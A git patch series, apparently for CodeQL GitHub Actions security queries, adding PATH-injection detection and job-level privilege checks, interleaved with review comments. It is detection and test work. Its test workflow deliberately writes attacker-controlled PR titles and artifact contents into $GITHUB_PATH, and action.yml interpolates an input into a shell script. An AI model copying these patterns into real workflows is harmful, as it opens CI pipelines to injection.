@@ -0,0 +1,68 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +private import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.DataFlow + +predicate envPathInjectionFromExprSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string value | + Utils::writeToGitHubPath(run, value) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getExpression()) > 0 + ) +} + +predicate envPathInjectionFromFileSink(DataFlow::Node sink) { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + sink.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubPath(run, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "$BODY" >> $GITHUB_PATH + */ +predicate envPathInjectionFromEnvSink(DataFlow::Node sink) { + exists(Run run, Expression expr, string varname, string value | + sink.asExpr().getInScopeEnvVarExpr(varname) = expr and + run = sink.asExpr() and + Utils::writeToGitHubPath(run, value) and + ( + value = ["$" + varname, "${" + varname + "}", "$ENV{" + varname + "}"] + or + value.matches("$(echo %") and value.indexOf(varname) > 0 + ) + ) +} + +private class EnvPathInjectionSink extends DataFlow::Node { + EnvPathInjectionSink() { + envPathInjectionFromExprSink(this) or + envPathInjectionFromFileSink(this) or + envPathInjectionFromEnvSink(this) or + externallyDefinedSink(this, "envpath-injection") + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. 
+ */ +private module EnvPathInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ +module EnvPathInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 7d95188cc8cf..0ae333a56f57 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -10,7 +10,7 @@ predicate envVarInjectionFromExprSink(DataFlow::Node sink) { Utils::writeToGitHubEnv(run, key, value) and expr = sink.asExpr() and run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 + value.indexOf(expr.getExpression()) > 0 ) } diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql new file mode 100644 index 000000000000..19b4cf6c01b1 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql 
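Review bot: `envPathInjectionFromExprSink` tests containment with `value.indexOf(expr.getExpression()) > 0`; `indexOf` yields -1 when the text is absent, so the precise test is `value.indexOf(expr.getExpression()) >= 0`, and `> 0` silently drops a value that begins with the expression text. The same comparison is carried into the EnvVarInjectionQuery.qll hunk below (`getRawExpression` to `getExpression`), so both should move together; if `> 0` is deliberate because `getExpression()` is expected to sit after a leading `${{`, a comment on that line should say so. `envPathInjectionFromEnvSink` compares `value` exactly against `$VAR`, `${VAR}` and `$ENV{VAR}`, which only works if the value `Utils::writeToGitHubPath` produces carries no surrounding whitespace or quotes; that assumption is worth stating in the QLDoc above it, which currently only gives the example.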
@@ -0,0 +1,32 @@
+/**
+ * @name PATH Enviroment Variable built from user-controlled sources
+ * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/envpath-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-077
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.security.EnvPathInjectionQuery
+import EnvPathInjectionFlow::PathGraph
+
+from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink
+where
+ EnvPathInjectionFlow::flowPath(source, sink) and
+ (
+ exists(source.getNode().asExpr().getEnclosingCompositeAction())
+ or
+ exists(Workflow w |
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ not w.isPrivileged()
+ )
+ )
+select sink.getNode(), source, sink,
+ "Potential PATH environment variable injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().toString()
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
new file mode 100644
index 000000000000..e9f55d1cbb24
--- /dev/null
+++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
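Review bot: The `@name` metadata reads `PATH Enviroment Variable built from user-controlled sources`; `Enviroment` is misspelled and this string is what users see in results, so it should be `@name PATH environment variable built from user-controlled sources`. The same typo is in PrivilegedEnvPathInjection.ql in the next hunk, which also writes `@security-severity 9` where this file uses the decimal `5.0` form; one numeric format across the pair is cleaner. Since the issue is an attacker-controlled search path rather than command injection, `external/cwe/cwe-427` (Uncontrolled Search Path Element) is arguably a better fit than, or a useful addition to, `external/cwe/cwe-077` in both files.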
@@ -0,0 +1,28 @@
+/**
+ * @name PATH Enviroment Variable built from user-controlled sources
+ * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/privileged-envpath-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-077
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.security.EnvPathInjectionQuery
+import EnvPathInjectionFlow::PathGraph
+
+from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink
+where
+ EnvPathInjectionFlow::flowPath(source, sink) and
+ exists(Workflow w |
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ w.isPrivileged()
+ )
+select sink.getNode(), source, sink,
+ "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().toString()
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml
new file mode 100644
index 000000000000..d22f09c03bdb
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml
@@ -0,0 +1,33 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + + - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $PATHINJ >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo ${PATHINJ} >> $GITHUB_PATH + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + path: foo + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH + - env: + ACTIONS_ALLOW_UNSECURE_COMMANDS: true + PATHINJ: ${{ github.event.pull_request.title }} + run: echo "::add-path::$PATHINJ" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual new file mode 100644 index 000000000000..6d9801ccd819 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual @@ -0,0 +1,10 @@ +edges +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:9:26:6 | Run Step | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:26:9:29:41 | Run Step | +nodes +| .github/workflows/path1.yml:11:21:11:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:9:26:6 | Run Step | semmle.label | Run Step | +| .github/workflows/path1.yml:26:9:29:41 | Run Step | semmle.label | Run Step | +subpaths +#select diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref new file mode 100644 index 000000000000..ab36454942e0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjection.ql 
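Review bot: The checked-in expectation ends with an empty `#select`, so none of the six `$GITHUB_PATH` sinks in path1.yml is actually asserted: the fixture is triggered by `pull_request_target`, which `isPrivileged()` classifies as privileged, and the only qlref points at the non-privileged `Security/CWE-077/EnvPathInjection.ql`. Add a second qlref for `Security/CWE-077/PrivilegedEnvPathInjection.ql` (or a `pull_request`-triggered copy of the fixture) so the positive cases produce rows, otherwise a regression that drops every sink would still pass. The expectation file is also named `EnvPathInjection.actual`, which is the name the CodeQL test runner writes as output, not the one it reads; it presumably should be `EnvPathInjection.expected`.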
From ef9583a92171ad1c8880e4200955613d98103d19 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 16:20:36 +0200 Subject: [PATCH 210/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b557a60a7512..94df84766b55 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.14 +version: 0.0.15 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99ecbe14d557..60e21004b842 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.14 +version: 0.0.15 groups: - actions - queries From 61976c684eadace821972df4519516a202b83f56 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 23:28:58 +0200 Subject: [PATCH 211/707] Lower privilege checks to Jobs --- .github/action/src/codeql.ts | 7 +++ action.yml | 35 ++++++++++- ql/lib/codeql/actions/Ast.qll | 33 +--------- ql/lib/codeql/actions/ast/internal/Ast.qll | 63 +++++++++++++++++++ .../codeql/actions/dataflow/ExternalFlow.qll | 7 +++ .../internal/ExternalFlowExtensions.qll | 5 ++ .../ext/workflow-models/workflow-models.yml | 5 ++ ql/lib/qlpack.yml | 1 + ql/src/Security/CWE-077/EnvPathInjection.ql | 8 +-- ql/src/Security/CWE-077/EnvVarInjection.ql | 8 +-- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 +- .../CWE-077/PrivilegedEnvVarInjection.ql | 6 +- ql/src/Security/CWE-078/CommandInjection.ql | 8 +-- .../CWE-078/PrivilegedCommandInjection.ql | 6 +- ql/src/Security/CWE-094/CodeInjection.ql | 8 +-- .../CWE-094/PrivilegedCodeInjection.ql | 6 +- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 8 +-- .../CWE-829/PrivilegedArtifactPoisoning.ql | 6 +- ql/test/library-tests/workflowenum.expected | 0 ql/test/library-tests/workflowenum.ql | 8 +++ ...ction.actual => EnvPathInjection.expected} | 0 .../.github/workflows/artifactpoisoning61.yml | 53 ++++++++++++++++ 22 files changed, 221 insertions(+), 66 deletions(-) create mode 100644 ql/lib/ext/workflow-models/workflow-models.yml create mode 100644 ql/test/library-tests/workflowenum.expected create mode 100644 ql/test/library-tests/workflowenum.ql rename ql/test/query-tests/Security/CWE-077/{EnvPathInjection.actual => EnvPathInjection.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 0fcdd81ee3fd..e845ec9fd4fd 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -147,6 +147,13 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; + const extPackPath = process.env["EXTPACK_PATH"]; + const extPackName = process.env["EXTPACK_NAME"]; + if (extPackPath !== undefined && extPackName !== undefined) { + cmd.push("--additional-packs", extPackPath); + cmd.push("--extension-packs", extPackName); + } + // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; diff --git a/action.yml b/action.yml index 9281212ea24e..42141a1dd74a 100644 --- a/action.yml +++ b/action.yml @@ -18,10 +18,41 @@ inputs: description: "CodeQL Suite to run" default: "actions-code-scanning" + workflow-models: + description: "Workflow models" + required: false + runs: using: 'composite' steps: - - name: Do something with context + - name: Process workflow models + shell: bash + if: inputs.workflow-models + run: | + // Create QLPack directory + mkdir workflow-extpack + cd workflow-extpack + + // Store the extension pack file + cat > models.yml << 'EOF' + ${{ inputs.workflow-models }} + EOF + + // Create QLPack + cat > qlpack.yml << 'EOF' + name: local/workflow-models + library: true + extensionTargets: + githubsecuritylab/actions-all: '*' + dataExtensions: + - models.yml + EOF + + // Set env vars + echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV + echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV + + - name: Scan workflows shell: bash env: GITHUB_TOKEN: ${{ inputs.token }} @@ -29,5 +60,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} + EXTPACK_PATH: ${{ inputs.extpack-path }} + EXTPACK_NAME: ${{ inputs.extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ac222741c025..7c4bf9aa8af0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
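Review bot: The `!== undefined` guard is not sufficient for these two variables, because action.yml in this same commit sets them from `${{ inputs.extpack-path }}` / `${{ inputs.extpack-name }}`, which are not declared inputs and so expand to the empty string; the env vars are then defined-but-empty and `--additional-packs ""` / `--extension-packs ""` are appended to every analyze run. Check for a non-empty value instead: `if (extPackPath && extPackName) {`. A comment naming the producer would also help, e.g. `// EXTPACK_PATH/EXTPACK_NAME are exported via $GITHUB_ENV by the "Process workflow models" step in action.yml; both are absent when no workflow-models input is given`. `codeqlDatabaseAnalyze` begins before and continues after this hunk.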
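Review bot: Interpolating `${{ inputs.workflow-models }}` directly into the `run:` script is a script-injection sink: the expression is substituted by the runner before bash parses the step, so the quoted `'EOF'` heredoc gives no protection — an input containing its own `EOF` line followed by shell text executes that text in the job that later receives `inputs.token`. Pass the value through the environment instead, `env: MODELS: ${{ inputs.workflow-models }}` on the step and `printf '%s\n' "$MODELS" > models.yml` in the script. Separately, the `// Create QLPack directory` lines are not bash comments: composite `shell: bash` runs with `-e`, and `//` resolves to the root directory and fails with "Is a directory", so the step aborts before `mkdir`; they need to be `#` comments.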
@@ -228,36 +228,7 @@ class Workflow extends AstNode instanceof WorkflowImpl { Strategy getStrategy() { result = super.getStrategy() } - predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and - count(this.getATriggerEvent()) = 1 - } - - predicate isPrivileged() { - // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" - or - // The Workflow accesses a secret - exists(SecretsExpression expr | - expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) - or - // The Workflow is triggered by an event other than `pull_request` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.isPrivileged() - ) - or - // The Workflow has multiple triggers so at least one is ont "pull_request" - count(this.getATriggerEvent()) > 1 - } + predicate isPrivileged() { super.isPrivileged() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -325,6 +296,8 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + predicate isPrivileged() { super.isPrivileged() } } class LocalJob extends Job instanceof LocalJobImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index dff5f351a69b..7cc70c86d20d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
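Review bot: The new public `Job.isPrivileged()` wrapper in the second hunk has no QLDoc, unlike the other members of `Job`, and since every `*Injection.ql` query in this commit now gates on it, its contract belongs at the API layer rather than only on `JobImpl`. Suggest `/** Holds if this job declares a write permission, reads a secret other than GITHUB_TOKEN, is modeled as privileged by workflowDataModel, or declares no permissions inside a privileged workflow. */`. The `Workflow.isPrivileged()` wrapper in the first hunk lost its inline explanation in the move to `WorkflowImpl` and would benefit from an equivalent one-line summary. The `Job` class body continues outside the hunk.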
@@ -1,6 +1,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.dataflow.ExternalFlow /** * Gets the length of each line in the StringValue . @@ -332,8 +333,40 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + private predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(this.getATriggerEvent()) = 1 + } + /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + + /** Holds if the workflow is privileged. */ + predicate isPrivileged() { + // The Workflow has a permission to write to some scope + this.getPermissions().getAPermission() = "write" + or + // The Workflow accesses a secret + exists(SecretsExpressionImpl expr | + expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or + // The Workflow is triggered by an event other than `pull_request` + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJobImpl call, WorkflowImpl caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.isPrivileged() + ) + or + // The Workflow has multiple triggers so at least one is not "pull_request" + count(this.getATriggerEvent()) > 1 + } } class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { 
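Review bot: `private import codeql.actions.dataflow.ExternalFlow` pulls the dataflow layer into the AST internals, and `ExternalFlow.qll` itself does `private import actions` (visible later in this commit), so the AST module now depends on a module that depends on the AST; the only thing consumed is the `workflowDataModel` predicate, so `private import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions` with `Extensions::workflowDataModel(...)` in `JobImpl` keeps the layering one-directional. In `isPrivileged`, `this.getPermissions().getAPermission() = "write"` only recognizes the map form; if `PermissionsImpl` (outside this hunk) does not also normalize the scalar `permissions: write-all`, a `pull_request`-triggered workflow using that shorthand is classified as unprivileged — worth confirming. The `count(this.getATriggerEvent()) > 1` branch deserves a comment that it is a deliberate over-approximation (`pull_request` + `push` is privileged only under `push`).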
@@ -597,6 +630,36 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + + /** Holds if the workflow is privileged. */ + predicate isPrivileged() { + // The job has a permission to write to some scope + this.getPermissions().getAPermission() = "write" + or + // The job accesses a secret + exists(SecretsExpressionImpl expr | + expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or + // The effective permissions have write access + exists(string path, string name, string secrets_source, string perms | + workflowDataModel(path, _, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") and + ( + secrets_source.trim().toLowerCase() = "actions" or + perms.toLowerCase().matches("%write%") + ) + ) + or + // The job has no expliclit permission, but the enclosing workflow is privileged + not exists(this.getPermissions()) and + not exists(SecretsExpressionImpl expr | + expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) and + // The enclosing workflow is privileged + this.getEnclosingWorkflow().isPrivileged() + } } class LocalJobImpl extends JobImpl { diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index cc7e4c633e31..5db10e7823ee 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,6 +2,13 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions +predicate workflowDataModel( + string path, string visibility, string job, string secrets_source, string permissions, + string runner +) { + Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) +} + /** * MaD sources * Fields: 
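Review bot: `name.trim().matches(this.getId() + "%")` is a prefix match with LIKE wildcards, so a job `build` also picks up model rows for `build-release`, and a job id containing `_` matches any character at that position; a job can therefore inherit `write`/actions-secrets privilege from an unrelated row of `workflowDataModel`. If the model's `job` column is the bare job id (the column is not documented in this commit), use `name.trim() = this.getId()`; if it carries a suffix, anchor the separator explicitly rather than the bare `%`. The QLDoc reads `Holds if the workflow is privileged` but this is `JobImpl`; suggest `/** Holds if this job is privileged: it declares a write permission, reads a non-GITHUB_TOKEN secret, is modeled as privileged, or declares no permissions inside a privileged workflow. */`. The `not exists(SecretsExpressionImpl ...)` conjunct in the last branch is redundant — whenever it fails the second branch already holds — and can be dropped.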
diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 8e8ce10bba9f..529f7721e71b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -22,3 +22,8 @@ extensible predicate summaryModel( extensible predicate sinkModel( string action, string version, string input, string kind, string provenance ); + +extensible predicate workflowDataModel( + string path, string visibility, string job, string secrets_source, string permissions, + string runner +); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml new file mode 100644 index 000000000000..f9f983be6937 --- /dev/null +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -0,0 +1,5 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: workflowDataModel + data: [] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 94df84766b55..d4b4ca8fdeba 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -15,3 +15,4 @@ groups: dataExtensions: - ext/*.model.yml - ext/**/*.model.yml + - ext/workflow-models/workflow-models.yml diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 19b4cf6c01b1..720b7aed8cc4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql 
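Review bot: The new `workflowDataModel` extensible predicate has no QLDoc, and since users will author rows for it by hand through the `workflow-models` action input, the column contract needs to be written down where it is declared: whether `path` is repository-relative, what `job` must contain (bare id or id plus name), which `secrets_source` values are recognized (`JobImpl` compares against `actions`), and whether `permissions` is free text searched for `write`. A block comment on the `extensible predicate` mirroring the `MaD sources` field list in `ExternalFlow.qll` would suffice. The seed `workflow-models.yml` with `data: []` could likewise carry a one-line comment saying it exists only so the extension point is registered.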
@@ -20,11 +20,11 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 2fca3b324941..af3f2998cc9d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -20,11 +20,11 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index e9f55d1cbb24..3e7c74ab895e 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql 
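Review bot: The same seven-line privilege gate is copy-pasted into six queries in this commit (CWE-077/078/094/829 and their privileged twins), each of which must be edited in lock-step whenever the notion of "privileged" changes; factoring it into a library predicate such as `predicate inNonPrivilegedContext(DataFlow::Node n) { exists(n.asExpr().getEnclosingCompositeAction()) or exists(Job j | j = n.asExpr().getEnclosingJob() and not j.isPrivileged()) }` next to `Job.isPrivileged()` would make each `where` a one-liner. The composite-action branch reports every flow inside an action regardless of who calls it, while the privileged twin has no such branch; a comment `// composite actions have no enclosing job, so they are always reported by this (non-privileged) query` would make that asymmetry read as intentional.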
@@ -19,9 +19,9 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 1a32183bfb22..aac7568e6548 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -19,9 +19,9 @@ import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index de60141bb400..6ac15f83207a 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql 
@@ -20,11 +20,11 @@ from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index bbfb226ecd1c..adb8f25f077a 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -19,9 +19,9 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index dc28cc2569ff..aa5bbfdf75a6 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql 
